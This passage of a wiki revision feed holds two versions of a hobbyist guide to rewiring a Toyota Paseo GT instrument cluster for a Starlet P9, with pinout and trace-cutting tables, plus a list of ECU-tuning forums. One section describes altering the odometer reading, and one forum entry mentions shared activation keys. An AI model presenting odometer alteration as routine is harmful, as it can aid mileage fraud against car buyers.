[https://www.bobadams5.com/posts/yadadashcam/ Yada 720P Roadcam Dashcam]&lt;br /&gt;
&lt;br /&gt;
===Cluster Swap / Modification===&lt;br /&gt;
[https://wiki.recessim.com/view/Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod Cluster Wiring Mod Toyota Paseo L17 GT in P9 Starlet]&lt;br /&gt;
&lt;br /&gt;
==Automotive Communication Interfaces==&lt;br /&gt;
Automotive electronics often communicate with protocols that are not common to other industries. Examples of automotive communication protocols include [[CAN]], [[LIN]], [[SENT]], and [[Ethernet]]&lt;br /&gt;
&lt;br /&gt;
===ECU Tuning, Repair &amp;amp; Reverse engineering communities / forums===&lt;br /&gt;
&lt;br /&gt;
*[https://carmasters.org/ CarMasters] - is a Russian‑language online forum dedicated to diagnosing, repairing, and discussing auto electronics and electromechanics across a wide range of car brand.&lt;br /&gt;
*[http://carcd.ru/forum/ CarCD] - is a Russian-language online community focused on automotive diagnostics, ECU tuning, repair tools, software sharing, and technical discussions for car electronics and chip tuning enthusiasts.&lt;br /&gt;
*[https://www.digital-kaos.co.uk/forums/ Digital Kaos] – is a broad tech forum with a strong auto diagnostics and ECU programming section.&lt;br /&gt;
*[https://garageforum.org/ GarageForum] - is an English-language forum focused on automotive software, diagnostics, workshop manuals, hardware tools, and technical support for car electronics and tuning.&lt;br /&gt;
*[https://mhhauto.com/ MHH Auto] - is a membership‑based community for sharing and discussing automotive software, ECU/airbag/dash activation keys, workshop manuals, tuning tools, and technical resources for educational and experimental car electronics projects.&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3263</id>
		<title>Toyota Paseo GT 1.5 odometer Starlet P9 mod</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3263"/>
		<updated>2025-12-31T14:32:31Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: fix&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Modification Overview =&lt;br /&gt;
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play &amp;quot;oem-clean&amp;quot; for the '''Toyota P9''' (EP91 4E-FE 1996-1999).&amp;lt;br&amp;gt;&lt;br /&gt;
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster.&amp;lt;br&amp;gt; After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market. &lt;br /&gt;
&lt;br /&gt;
There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.&lt;br /&gt;
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''&lt;br /&gt;
&lt;br /&gt;
[[File:Clusters.png|frameless|380×300px|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
==  Toyota Starlet P9 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: P30, with Tachometer by DENSO.&lt;br /&gt;
Part numbers: 83800-10060 and 157370-5241.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || IG− (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || SRS airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || SRS airbag warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Right turn signal indicator&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Check engine light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || E terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || T terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || F terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==  Paseo GT 1.5 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: L17, with Tachometer by JECO.&lt;br /&gt;
Part numbers: 83800-16080 and 82208-001.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || P (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 11 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || Open door warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || Open door warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || FU terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Upper E terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Right turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Master warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || TU terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || TE terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 15 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Instrument Cluster Wiring Modification ==&lt;br /&gt;
These are the modifications needed to be made on the GT cluster.&lt;br /&gt;
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.&lt;br /&gt;
&lt;br /&gt;
=== Cutting Traces ===&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT (cut close at FU terminal, leave room to solder)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT&lt;br /&gt;
|-&lt;br /&gt;
| 9 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Rewiring Traces ===&lt;br /&gt;
Rewiring can be done with jumpers made from resistor leads with heat shrink tubing around them or solid core modwire.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 2''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 5''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Must now connect to what '''PIN 10''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to '''PIN 5''' on '''connector B (16pin)''' going to oil pressure indicator light&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Must now connect to what '''PIN 1''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC / OPEN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Must now connect to what '''PIN 5''' went to (FU terminal of fuel gauge)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 1''' went to (high beam indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to the top of the high beam indicator light, here we disconnected two traces.&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Must now connect to what '''PIN 3''' went to (left indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 7''' went to (E/FE screw terminals)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Must now connect to what '''PIN 6''' went to (reed switch, purpose unknown) &lt;br /&gt;
|-&lt;br /&gt;
| 10 || Must now connect to what '''PIN 8''' went to (right indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| Jumper || Place a jumper from FE terminal (fuel gauge) to cut trace were '''PIN 2''' went to (top lamp ground)&lt;br /&gt;
|}&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cut_double_trace_high_beam.PNG|Important disconnect two high beam indicator light traces on the top. Just jump the rest of the trace accordingly.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Cluster mods.jpg|A picture of all the mods that have been applied.&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Rewire&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Must now connect to what '''PIN 3''' went to (now goes to ABS warning indicator light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Must now connect to what '''PIN 4''' went to (now goes to check engine light)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Must now connect to what '''PIN 8''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC / OPEN&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Must now connect to '''PIN 4''' on '''connector C (10pin)''' going to FU fuel gauge terminal&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Must now connect to what '''PIN 7''' went to&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Must now connect to what '''PIN 9''' went to&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== ODO Correction ==&lt;br /&gt;
If you want to correct yours to avoid getting in trouble by road inspection service. You will have to change it back to your old ODO meter milage.&amp;lt;br&amp;gt;&lt;br /&gt;
Please do not abuse this trick.. I have set mine from around 110.000 to 300.000. Just so I don't get in trouble.&amp;lt;br&amp;gt;&lt;br /&gt;
In the image below you can see how I did it.&lt;br /&gt;
&amp;lt;gallery widths=302 heights=182&amp;gt;&lt;br /&gt;
File:Odo correction.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Notes on the Modification ==&lt;br /&gt;
Leave the four lamps open (remove bulb). Do this for: '''open door warning, SRS airbag warning, park warning lights''' in the bottom left corner under connector A. Also next to connector A you have a the indicator light and a '''triangle warning light'''. Leave the triangle warning light open too. All these light are unused and '''not connected''', connecting them might short something not reverse engineered.&lt;br /&gt;
They must all be left OPEN FLOATING ('''important''').&lt;br /&gt;
&lt;br /&gt;
= Night time backlight =&lt;br /&gt;
[[File:Nighttime running.png|frameless|380×300px|thumb|left]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3262</id>
		<title>Toyota Paseo GT 1.5 odometer Starlet P9 mod</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Toyota_Paseo_GT_1.5_odometer_Starlet_P9_mod&amp;diff=3262"/>
		<updated>2025-12-31T14:30:14Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: edits&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Modification Overview =&lt;br /&gt;
Modding guide on how to make the '''Toyota Paseo 1.5 GT''' (5E-FE 1995-1999) odometer plug and play &amp;quot;oem-clean&amp;quot; for the '''Toyota P9''' (EP91 4E-FE 1996-1999).&amp;lt;br&amp;gt;&lt;br /&gt;
This mod has the focus on not messing with the car wiring by depinning and changing the OEM wiring, but by modifying the GT cluster.&amp;lt;br&amp;gt; After all while GT parts are relatively abundant, GT cars themselves are far less common on the road, making these odometers extremely cheap and readily available in the Japanese used-parts market. &lt;br /&gt;
&lt;br /&gt;
There are three connectors on the back of these odometer clusters the connectors are both the same type however the pinout is different.&lt;br /&gt;
Most left connector is named '''A''', the middle one '''C''' and the most right one '''B'''. So: '''A, C, B.'''&lt;br /&gt;
&lt;br /&gt;
[[File:Clusters.png|frameless|380×300px|thumb|left]]&lt;br /&gt;
&lt;br /&gt;
__TOC__&lt;br /&gt;
&lt;br /&gt;
==  Toyota Starlet P9 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: P30, with Tachometer by DENSO.&lt;br /&gt;
Part numbers: 83800-10060 and 157370-5241.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || IG− (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || SRS airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || SRS airbag warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Upper B (E terminal on Paseo) terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Right turn signal indicator&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || E terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || T terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 7 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || F terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 15 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==  Paseo GT 1.5 Instrument Cluster Pinout ==&lt;br /&gt;
Cluster details: L17, with Tachometer by JECO.&lt;br /&gt;
Part numbers: 83800-16080 and 82208-001.&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || IG+ (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Low battery warning light → diode&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Low battery warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Parking brake warning light&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 8 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || P (Tachometer)&lt;br /&gt;
|-&lt;br /&gt;
| 11 || Connected || Airbag warning light&lt;br /&gt;
|-&lt;br /&gt;
| 12 || Connected || Open door warning light&lt;br /&gt;
|-&lt;br /&gt;
| 13 || Connected || Open door warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || High beam indicator&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || Common ground for indicator lights (high beam, turn signals, fog light)&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || Left turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || FU terminal – fuel gauge&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Fog light indicator&lt;br /&gt;
|-&lt;br /&gt;
| 6 || Connected || Lower 4P terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Upper E terminal (next to speedometer)&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || Right turn signal indicator&lt;br /&gt;
|-&lt;br /&gt;
| 9 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 10 || Connected || Master warning light&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Status !! Function / Notes&lt;br /&gt;
|-&lt;br /&gt;
| 1 || Connected || Low fuel warning light&lt;br /&gt;
|-&lt;br /&gt;
| 2 || Connected || TU terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 3 || Connected || ABS warning light&lt;br /&gt;
|-&lt;br /&gt;
| 4 || Connected || Check engine light (MIL)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || Connected || Low oil pressure warning light (oil pressure switch)&lt;br /&gt;
|-&lt;br /&gt;
| 6 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 7 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 8 || Connected || TE terminal – temperature gauge&lt;br /&gt;
|-&lt;br /&gt;
| 9 || Connected || Gauge backlight lamps&lt;br /&gt;
|-&lt;br /&gt;
| 10 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 11 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 12 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 13 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 14 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 15 || NC || —&lt;br /&gt;
|-&lt;br /&gt;
| 16 || NC || —&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Instrument Cluster Wiring Modification ==&lt;br /&gt;
These are the modifications needed to be made on the GT cluster.&lt;br /&gt;
Below you will see the tables of traces that will need to be cut first. After cutting them we will rewire them.&lt;br /&gt;
&lt;br /&gt;
=== Cutting Traces ===&lt;br /&gt;
&lt;br /&gt;
Left Connector A (13-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Middle Connector C (10-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 1 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 4 || CUT (cut close at FU terminal, leave room to solder)&lt;br /&gt;
|-&lt;br /&gt;
| 5 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 6 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 7 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 8 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 10 || CUT &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Right Connector B (16-pin)&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Pin !! Cutting &lt;br /&gt;
|-&lt;br /&gt;
| 2 || CUT &lt;br /&gt;
|-&lt;br /&gt;
| 3 || CUT &lt;br /&gt;
